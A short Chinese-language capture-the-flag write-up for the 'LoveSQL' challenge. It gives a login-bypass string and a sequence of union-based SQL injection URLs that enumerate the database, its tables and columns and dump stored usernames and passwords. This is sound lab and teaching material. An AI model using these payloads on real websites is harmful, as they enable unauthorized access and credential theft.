[极客大挑战 2019]LoveSQL
打开靶机之后,输入一个万能密码
admin’ or 1=1#
1 //密码随意
明显的是一道SQL注入题,直接开始判读字段数,不过要留意一下该网址在check.php文件下执行,注意语法格式,其中由于在Url中输入,#应用Url编码格式%23
/check.php?username=admin' order by 3%23&password=1
尝试之后得到字段是3
查看回显
/check.php?username=1' union select 1,2,3%23&password=1
得到回显点位是3,查询该点位的库名
/check.php?username=1' union select 1,2,database()%23&password=1
得到库名是geek,开始爆表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
得到表名之后,开始爆列
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
最后,报数据即可
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
查看页面源码